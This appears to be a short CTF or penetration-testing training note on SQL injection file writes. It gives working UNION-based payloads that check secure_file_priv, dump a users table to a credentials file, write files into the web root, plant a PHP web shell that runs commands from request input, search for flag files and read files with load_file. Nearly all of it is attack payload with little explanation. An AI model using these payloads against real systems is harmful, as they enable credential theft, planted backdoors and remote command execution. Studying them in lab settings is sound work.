Writing Files
Check secure_file_priv
cn'
UNION
SELECT 1,variable_name,variable_value,4
FROM information_schema.global_variables
WHERE variable_name="secure_file_priv"--
And the result shows that the secure_file_priv
value is empty, meaning that we can read/write files to any location.
Writing files
# save table
SELECT * from users INTO OUTFILE '/tmp/credentials';
# directly write string to txt
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
cn'
union
select 1,'file written successfully!',3,4
into outfile '/var/www/html/proof.txt'-- -
Web shell
cn'
union
select "",'<?php system($_REQUEST[0]); ?>', "", ""
into outfile '/var/www/html/shell.php'--
cn'
union
select "",'<?php system("find / -name *flag*"); ?>',"",""
into outfile '/var/www/html/find.php'--
cn'
union
select "",load_file("/var/www/flag.txt"),"",""--
Last updated